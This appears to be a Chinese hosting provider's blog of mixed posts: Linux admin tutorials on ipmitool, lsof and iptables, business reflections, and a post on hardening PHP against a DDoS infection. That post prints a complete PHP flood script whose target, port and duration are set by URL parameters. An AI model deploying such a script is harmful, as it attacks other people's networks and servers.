解决HTML网页中文显示乱码
发布HTML网页的会乱码?并不是空间不支持,而是编码问题。添加以下代码到网页的head标签中即可解决问题
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″>
发布HTML网页的会乱码?并不是空间不支持,而是编码问题。添加以下代码到网页的head标签中即可解决问题
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″>
1:安装ipmitool
无论是centos,还是ubuntu都可以直接安装,源里都有
yum -y install ipmitool
apt-get -y install ipmitool
2:加载IMPI
http://wiki.adamsweet.org/doku.php?id=ipmi_on_linux
modprobe ipmi_msghandler
modprobe ipmi_devintf
modprobe ipmi_si
3:使用
查看ipmi信息
# ipmitool lan prinet
设置ipmi ipaddress
# ipmitool lan set 1 ipaddr 172.16.124.62
设置掩码
# ipmitool lan set 1 netmask 255.255.0.0
查看用户
# ipmitool user list 1
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN false false true ADMINISTRATOR
把管理员密码修改成 :chenshake
# ipmitool user set password 2 chenshake
参考:http://yyri.blog.163.com/blog/static/148943951201212364551621/
经历了挺多,感觉从10月开始就没闲着,每天都起早贪黑。一系列的事情下来,我也累了,不想折腾了,一度想过把用户转移给别人,然后想退款的,给退款。但最后,还是放不下。一种责任感吧,不可推卸的责任感。既然做了,就要坚持下去,既然给了用户承诺,就要去履行。
因为我太心急,10月以来一直在上线新服务和产品,搞的现在支出和收入差距拉的非常大!面临的最大压力就是成本开销了。美国服务器也是为了减少成本才下架的。本来是想只保留一个HK主机,专注一个系列的产品的。后来考虑到台湾空间的用户就是为了减少麻烦才转移过来的,我不好意思再让转移到HK,毕竟一个月都还没到。勉强维持2个系统的产品吧,我现在只是希望每月能够保本,安安静静,简简单单,就这样慢慢的发展。
客户也都挺熟悉的,大部分都是买了很多产品的,很多是客户推荐客户过来的。关系也都挺融洽的,偶尔遇到一些问题也能够很快处理好。我还是有些心浮气躁,有的时候客户问我一些比较基础的问题,问的要是比较多,而且常来问,我就会多少表现出一些不太想回答的感觉。有些东西,百度或者谷歌一下就可以搜到了,有些是建站的基础的基础。有的时候尽管有点儿不乐意,还是回复过去了,现在野草主机就好像是新手建站培训的地方啦……
还是我心态问题吧!不能放平心态去处理用户提出的问题,虽然有些是基础,但毕竟自己也是这么过来的,自己那时候也是这么期待别人回答自己的。不能用自己的标准去看待客户的问题!我常容易自满、高傲、轻视别人,几乎每天我都会告诉自己几遍不要让自己出现这些心态。但有的时候,还是经常不由自主的说一些话,然后几秒后反映过来了,再接着温和的解释,不让人误解自己和掩饰那句不那么好听的话。
真想这段时间过后,安静的卖空间,敲敲代码,看看书,折腾,看看客户的网站,处理用户的服务单。最满足的也就是这样了,理想中的生活!
在优酷看到一个视频,完美的解释了男人为什么爱盯着胸部看,当下次你女朋友或即将是女朋友的姑娘问你为什么这么色!?你可以这么跟她说,太完美了,点击听听人家是怎么把妹的!
在Linux下glibc提供了我们事先编译好的许多timezone文件, 他们就放在/usr/share/zoneinfo这个目录下,这里基本涵盖了大部分的国家和城市
# ls -F /usr/share/zoneinfo/ Africa/ Chile/ Factory Iceland Mexico/ posix/ Universal America/ CST6CDT GB Indian/ Mideast/ posixrules US/ Antarctica/ Cuba GB-Eire Iran MST PRC UTC Arctic/ EET GMT iso3166.tab MST7MDT PST8PDT WET Asia/ Egypt GMT0 Israel Navajo right/ W-SU Atlantic/ Eire GMT-0 Jamaica NZ ROC zone.tab Australia/ EST GMT+0 Japan NZ-CHAT ROK Zulu Brazil/ EST5EDT Greenwich Kwajalein Pacific/ Singapore Canada/ Etc/ Hongkong Libya Poland Turkey CET Europe/ HST MET Portugal UCT
在这里面我们就可以找到自己所在城市的time zone文件. 那么如果我们想查看对于每个time zone当前的时间我们可以用zdump命令
# zdump Hongkong Hongkong Fri Jul 6 06:13:57 2007 HKT
那么我们又怎么来告诉系统我们所在time zone是哪个呢?这里举例一种比较方便的
我们可以在/usr/share/zoneinfo下找到我们的time zone文件然后拷贝去到/etc/localtimezone(或者做个symbolic link)
我们想把time zone换成上海所在的时区就可以这么做
# ln -sf /usr/share/zoneinfo/posix/Asia/Shanghai /etc/localtime # date Fri Jul 6 06:35:52 CST 2007
date是查看当前系统时间
第二种方法:
vi /etc/crontab
加上一句:
00 0 1 * * root rdate -s time.nist.gov
time.nist.gov 是一个时间服务器.
参考自:
http://www.linuxsir.org/bbs/thread307840.html
http://blueicer.blog.51cto.com/395686/116426
很多年前,我刚来到这座城市的时候,她还未像现在这样丰满,城厢工业园里大大小小的工厂,甚至在村里也有了很多小型加工厂,城区越来越多的大型商城驻入,琳琅满目。市区也在慢慢扩大,到处在修建高楼大厦,到处贴满了卖房、黄金楼盘、旺铺、别墅广告。我目睹了这个城市的发展。
早些年路边有很多的树,人行道还很宽,路边有花坛。被当地称为母亲河的溪还有许多鱼,我常去垂钓,到了夏天还有人去游泳。乡村还别有一番风味。城市还没有万达,市区周边还没有那么多的大厦。古代留下来的护城河水还没变黑。
一、安装
我的是centos系统,可以直接使用yum安装。
[root@test /]# yum install lsof
等待安装成功。
如果你下载源码或者二进制安装也可以。
先下载
[root@test /]# wget http://down1.chinaunix.net/distfiles/lsof_4.76.tar.gz
安装:
[root@test /]# tar -zxvf lsof.tar.gz
[root@test /]# cd lsof_4.78/
[root@test /]# tar -xvf lsof_4.78_src.tar
[root@test /]# ./Configure linux
[root@test /]# make
不出意外的搞定手工。
二、lsof简介
lsof(list open files)是一个列出当前系统打开文件的工具。在linux环境下,任何事物都以文件的形式存在,通过文件不仅仅可以访问常规数据,还可以访问网络连接和硬件。所以如传输控制协议 (TCP) 和用户数据报协议 (UDP) 套接字等,系统在后台都为该应用程序分配了一个文件描述符,无论这个文件的本质如何,该文件描述符为应用程序与基础操作系统之间的交互提供了通用接口。因为应用程序打开文件的描述符列表提供了大量关于这个应用程序本身的信息,因此通过lsof工具能够查看这个列表对系统监测以及排错将是很有帮助的。
三、命令详解
1、在终端下输入lsof即可显示系统打开的文件,因为 lsof 需要访问核心内存和各种文件,所以必须以 root 用户的身份运行它才能够充分地发挥其功能。
lsof输出各列信息的意义如下:
COMMAND:进程的名称
PID:进程标识符
USER:进程所有者
FD:文件描述符,应用程序通过文件描述符识别该文件。如cwd、txt等
TYPE:文件类型,如DIR、REG等
DEVICE:指定磁盘的名称
SIZE:文件的大小
NODE:索引节点(文件在磁盘上的标识)
NAME:打开文件的确切名称
其中FD 列中的文件描述符cwd 值表示应用程序的当前工作目录,这是该应用程序启动的目录,除非它本身对这个目录进行更改。txt 类型的文件是程序代码,如应用程序二进制文件本身或共享库,如上列表中显示的 /sbin/init 程序。其次数值表示应用程序的文件描述符,这是打开该文件时返回的一个整数。如上的最后一行文件/dev/initctl,其文件描述符为 10。u 表示该文件被打开并处于读取/写入模式,而不是只读 (r) 或只写 (w) 模式。同时还有大写 的W 表示该应用程序具有对整个文件的写锁。该文件描述符用于确保每次只能打开一个应用程序实例。初始打开每个应用程序时,都具有三个文件描述符,从 0 到 2,分别表示标准输入、输出和错误流。所以大多数应用程序所打开的文件的 FD 都是从 3 开始。
与 FD 列相比,Type 列则比较直观。文件和目录分别称为 REG 和 DIR。而CHR 和 BLK,分别表示字符和块设备;或者 UNIX、FIFO 和 IPv4,分别表示 UNIX 域套接字、先进先出 (FIFO) 队列和网际协议 (IP) 套接字。
2、lsof常用参数
lsof 常见的用法是查找应用程序打开的文件的名称和数目。可用于查找出某个特定应用程序将日志数据记录到何处,或者正在跟踪某个问题。例如,linux限制了进程能够打开文件的数目。通常这个数值很大,所以不会产生问题,并且在需要时,应用程序可以请求更大的值(直到某个上限)。如果你怀疑应用程序耗尽了文件描述符,那么可以使用 lsof 统计打开的文件数目,以进行验证。lsof语法格式是:
lsof [options] filename
常用的参数列表:
lsof filename 显示打开指定文件的所有进程
lsof -a 表示两个参数都必须满足时才显示结果
lsof -c string 显示COMMAND列中包含指定字符的进程所有打开的文件
lsof -u username 显示所属user进程打开的文件
lsof -g gid 显示归属gid的进程情况
lsof +d /DIR/ 显示目录下被进程打开的文件
lsof +D /DIR/ 同上,但是会搜索目录下的所有目录,时间相对较长
lsof -d FD 显示指定文件描述符的进程
lsof -n 不将IP转换为hostname,缺省是不加上-n参数
lsof -i 用以显示符合条件的进程情况
lsof -i[46] [protocol][@hostname|hostaddr][:service|port]
46 --> IPv4 or IPv6
protocol --> TCP or UDP
hostname --> Internet host name
hostaddr --> IPv4地址
service --> /etc/service中的 service name (可以不只一个)
port --> 端口号 (可以不只一个)
例如: 查看22端口现在运行的情况
[root@test /]# lsof -i :22
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 1409 root 3u IPv6 5678 TCP *:ssh (LISTEN)
查看所属root用户进程所打开的文件类型为txt的文件:
[root@test /]# lsof -a -u root -d txt
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
init 1 root txt REG 3,3 38432 1763452 /sbin/init
mingetty 1632 root txt REG 3,3 14366 1763337 /sbin/mingetty
mingetty 1633 root txt REG 3,3 14366 1763337 /sbin/mingetty
mingetty 1634 root txt REG 3,3 14366 1763337 /sbin/mingetty
mingetty 1635 root txt REG 3,3 14366 1763337 /sbin/mingetty
mingetty 1636 root txt REG 3,3 14366 1763337 /sbin/mingetty
mingetty 1637 root txt REG 3,3 14366 1763337 /sbin/mingetty
kdm 1638 root txt REG 3,3 132548 1428194 /usr/bin/kdm
X 1670 root txt REG 3,3 1716396 1428336 /usr/bin/Xorg
kdm 1671 root txt REG 3,3 132548 1428194 /usr/bin/kdm
startkde 2427 root txt REG 3,3 645408 1544195 /bin/bash
... ...
3、lsof使用实例
a、查找谁在使用文件系统
在卸载文件系统时,如果该文件系统中有任何打开的文件,操作通常将会失败。那么通过lsof可以找出那些进程在使用当前要卸载的文件系统,如下:
[root@test /]# lsof /GTES11/
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
bash 4208 root cwd DIR 3,1 4096 2 /GTES11/
vim 4230 root cwd DIR 3,1 4096 2 /GTES11/
在这个示例中,用户root正在其/GTES11目录中进行一些操作。一个 bash是实例正在运行,并且它当前的目录为/GTES11,另一个则显示的是vim正在编辑/GTES11下的文件。要成功地卸载/GTES11,应该在通知用户以确保情况正常之后,中止这些进程。
这个示例说明了应用程序的当前工作目录非常重要,因为它仍保持着文件资源,并且可以防止文件系统被卸载。这就是为什么大部分守护进程(后台进程)将它们的目录更改为根目录、或服务特定的目录(如 sendmail 示例中的 /var/spool/mqueue)的原因,以避免该守护进程阻止卸载不相关的文件系统。
a、恢复删除的文件
当Linux计算机受到入侵时,常见的情况是日志文件被删除,以掩盖攻击者的踪迹。管理错误也可能导致意外删除重要的文件,比如在清理旧日志时,意外地删除了数据库的活动事务日志。有时可以通过lsof来恢复这些文件。
当进程打开了某个文件时,只要该进程保持打开该文件,即使将其删除,它依然存在于磁盘中。这意味着,进程并不知道文件已经被删除,它仍然可以向打开该文件时提供给它的文件描述符进行读取和写入。除了该进程之外,这个文件是不可见的,因为已经删除了其相应的目录索引节点。
在/proc 目录下,其中包含了反映内核和进程树的各种文件。/proc目录挂载的是在内存中所映射的一块区域,所以这些文件和目录并不存在于磁盘中,因此当我们对这些文件进行读取和写入时,实际上是在从内存中获取相关信息。大多数与 lsof 相关的信息都存储于以进程的 PID 命名的目录中,即 /proc/1234 中包含的是 PID 为 1234 的进程的信息。每个进程目录中存在着各种文件,它们可以使得应用程序简单地了解进程的内存空间、文件描述符列表、指向磁盘上的文件的符号链接和其他系统信息。lsof 程序使用该信息和其他关于内核内部状态的信息来产生其输出。所以lsof 可以显示进程的文件描述符和相关的文件名等信息。也就是我们通过访问进程的文件描述符可以找到该文件的相关信息。
当系统中的某个文件被意外地删除了,只要这个时候系统中还有进程正在访问该文件,那么我们就可以通过lsof从/proc目录下恢复该文件的内容。 假如由于误操作将/var/log/messages文件删除掉了,那么这时要将/var/log/messages文件恢复的方法如下:
首先使用lsof来查看当前是否有进程打开/var/logmessages文件,如下:
[root@test /]# lsof |grep /var/log/messages
syslogd 1283 root 2w REG 3,3 5381017 1773647 /var/log/messages (deleted)
从上面的信息可以看到 PID 1283(syslogd)打开文件的文件描述符为 2。同时还可以看到/var/log/messages已经标记被删除了。因此我们可以在 /proc/1283/fd/2 (fd下的每个以数字命名的文件表示进程对应的文件描述符)中查看相应的信息,如下:
[root@test /]# head -n 10 /proc/1283/fd/2
Aug 4 13:50:15 holmes86 syslogd 1.4.1: restart.
Aug 4 13:50:15 holmes86 kernel: klogd 1.4.1, log source = /proc/kmsg started.
Aug 4 13:50:15 holmes86 kernel: Linux version 2.6.22.1-8 (root@everestbuilder.linux-ren.org) (gcc version 4.2.0) #1 SMP Wed Jul 18 11:18:32 EDT 2007
Aug 4 13:50:15 holmes86 kernel: BIOS-provided physical RAM map:
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 0000000000000000 - 000000000009f000 (usable)
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 000000000009f000 - 00000000000a0000 (reserved)
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 0000000000100000 - 000000001f7d3800 (usable)
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 000000001f7d3800 - 0000000020000000 (reserved)
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 00000000e0000000 - 00000000f0007000 (reserved)
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 00000000f0008000 - 00000000f000c000 (reserved)
从上面的信息可以看出,查看 /proc/8663/fd/15 就可以得到所要恢复的数据。如果可以通过文件描述符查看相应的数据,那么就可以使用 I/O 重定向将其复制到文件中,如:
cat /proc/1283/fd/2 > /var/log/messages
对于许多应用程序,尤其是日志文件和数据库,这种恢复删除文件的方法非常有用。
本文参考:http://www.cnblogs.com/wanghaosoft/archive/2013/01/11/2857216.html
前几天有台香港服务器上的DEDE用户被入侵了,植入了PHP-DDOS发包代码,影响了网络,导致同服务器用户网站都无法正常访问。这段代码是用fsockopen函数请求外部,我们可以禁止这个函数。
php.ini
搜索:disable_functions
在后面加上:fsockopen
allow_url_fopen = Off
ignore_user_abort = On
以及把
extension=php_sockets.dll
改成
;extension=php_sockets.dll
保存退出,重启 Apache。
然后利用iptables,禁本机对外发送UDP包
iptables -A INPUT -p tcp -m tcp --sport 53 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT iptables -A INPUT -p udp -m udp --sport 53 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp -m tcp --sport 1024:65535 -d 8.8.4.4 --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p udp -m udp --sport 1024:65535 -d 8.8.8.8 --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p udp -j REJECT
以上就可以防止PHP-DDOS发包了,但是可能会使一些PHP程序异常,比如DZ需要fsockopen函数发信等。但都有解决办法,可以把fsockopen函数,替换为:pfsockopen,就基本可以解决所有问题了。
一段PHPDDOS代码,完成以上操作后,可以试试能否运行成功。
<?php
error_reporting(0);//禁用错误报告
set_time_limit(0);//配置该页最久执行时间。 0为永久执行
ignore_user_abort(false); //设置与客户机断开是否会终止脚本的执行。
/*get参数*/
$type = $_GET['type']; //攻击方式 0为TCP 1为UDP
$host = $_GET['host']; //攻击目标
$port = $_GET['port']; //攻击端口
$exec_time = $_GET['time']; //持续时间
$Sendlen = $_GET['size']; //发送数据长度 如果为0则使用自定义数据包
$data = $_GET['data']; //自定义数据包 最大为1024KB 格式为URL编码
$data = urldecode($data); //URL解码后的字符串
$count = $_GET['count']; //限制发包次数 0为不限制然后只能通过时间控制
/*end*/
if (function_exists('fsockopen')){$test="1";}else{$test="0";}//fsockopen是否能用
//检测服务器信息 返回格式 [标识符]函数状态|主机名|脚本名|服务器信息|结译引擎[标识符]
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$test."|".$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER
['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "error";
exit;
}
$byte = 0;//记录发包次数
$max_time = time()+$exec_time;//设置结束时间
if($Sendlen!=0){
for($i=0;$i<$Sendlen;$i++){$out .= "X";}//构造指定长度数据包
}else{
$out = $data; //设置为自定义数据包
}
//死循环发送数据
while(1){
if(time() > $max_time){break;}//时间到了就跳出循环
//判断攻击方式
if($type==1) {
$fp = fsockopen("tcp://$host", $port, $errno, $errstr, 5);//打开TCP连接
} else {
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);//打开UDP连接
}
if($fp){ //如果连接成功
fwrite($fp, $out); //发送数据
fclose($fp); //关闭连接
}
$byte++;//发包次数加1
if((int)$count!=0){
if($byte > (int)$count){break;}//发包次数大于设置的就跳出循环
}
}
?> 前两天Google些资料,意外的找到了圆通主机创始人的博客。也许现在已经很少人对他有印象了,以前也是小有名气的,做了1年多吧,2周年前关闭了。看到他的一篇文章。颇有几分感慨,因为很多的经历都是类似的。我在想,明年,我是不是也会像他一样跑路。他也是很有责任心的一个人,处理好了所有用户的退款等,然后才不做了。
这里只列出比较常用的参数,详细的请查看man iptables
1、查看
iptables -nvL –line-number
-L 查看当前表的所有规则,默认查看的是filter表,如果要查看NAT表,可以加上-t NAT参数
-n 不对ip地址进行反查,加上这个参数显示速度会快很多
-v 输出详细信息,包含通过该规则的数据包数量,总字节数及相应的网络接口
–line-number 显示规则的序列号,这个参数在删除或修改规则时会用到
2、添加
添加规则有两个参数:-A和-I。其中-A是添加到规则的末尾;-I可以插入到指定位置,没有指定位置的话默认插入到规则的首部。
当前规则:
[root@test ~]# iptables -nL --line-number Chain INPUT (policy ACCEPT) num target prot opt source destination 1 DROP all -- 192.168.1.1 0.0.0.0/0 2 DROP all -- 192.168.1.2 0.0.0.0/0 3 DROP all -- 192.168.1.4 0.0.0.0/0
添加一条规则到尾部:
[root@test ~]# iptables -A INPUT -s 192.168.1.5 -j DROP
再插入一条规则到第三行,将行数直接写到规则链的后面:
[root@test ~]# iptables -I INPUT 3 -s 192.168.1.3 -j DROP
查看:
[root@test ~]# iptables -nL --line-number Chain INPUT (policy ACCEPT) num target prot opt source destination 1 DROP all -- 192.168.1.1 0.0.0.0/0 2 DROP all -- 192.168.1.2 0.0.0.0/0 3 DROP all -- 192.168.1.3 0.0.0.0/0 4 DROP all -- 192.168.1.4 0.0.0.0/0 5 DROP all -- 192.168.1.5 0.0.0.0/0
可以看到192.168.1.3插入到第三行,而原来的第三行192.168.1.4变成了第四行。
3、删除
删除用-D参数
删除之前添加的规则(iptables -A INPUT -s 192.168.1.5 -j DROP):
[root@test ~]# iptables -D INPUT -s 192.168.1.5 -j DROP
有时候要删除的规则太长,删除时要写一大串,既浪费时间又容易写错,这时我们可以先使用–line-number找出该条规则的行号,再通过行号删除规则。
[root@test ~]# iptables -nv --line-number iptables v1.4.7: no command specified Try `iptables -h' or 'iptables --help' for more information. [root@test ~]# iptables -nL --line-number Chain INPUT (policy ACCEPT) num target prot opt source destination 1 DROP all -- 192.168.1.1 0.0.0.0/0 2 DROP all -- 192.168.1.2 0.0.0.0/0 3 DROP all -- 192.168.1.3 0.0.0.0/0
删除第二行规则
[root@test ~]# iptables -D INPUT 2
4、修改
修改使用-R参数
先看下当前规则:
[root@test ~]# iptables -nL --line-number Chain INPUT (policy ACCEPT) num target prot opt source destination 1 DROP all -- 192.168.1.1 0.0.0.0/0 2 DROP all -- 192.168.1.2 0.0.0.0/0 3 DROP all -- 192.168.1.5 0.0.0.0/0
将第三条规则改为ACCEPT:
[root@test ~]# iptables -R INPUT 3 -j ACCEPT
再查看下:
[root@test ~]# iptables -nL --line-number Chain INPUT (policy ACCEPT) num target prot opt source destination 1 DROP all -- 192.168.1.1 0.0.0.0/0 2 DROP all -- 192.168.1.2 0.0.0.0/0 3 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0
第三条规则的target已改为ACCEPT。
转载:http://ns.35.com/?p=211
折腾了个CDN,给美国空间客户用,我博客已经套上了。有3个节点,JP、JGP PCCW、LOS,国内访问还是不错的!国外也不差!目前就这些节点吧,看看用户体验再做整改,以后再加韩国、香港节点。折腾CDN的原因就不说了,美国空间的机房在KSS,国内访问比较稳定,但速度没有那么理想。CDN可以很好解决这个问题,成本比较低,又能提高客户体验。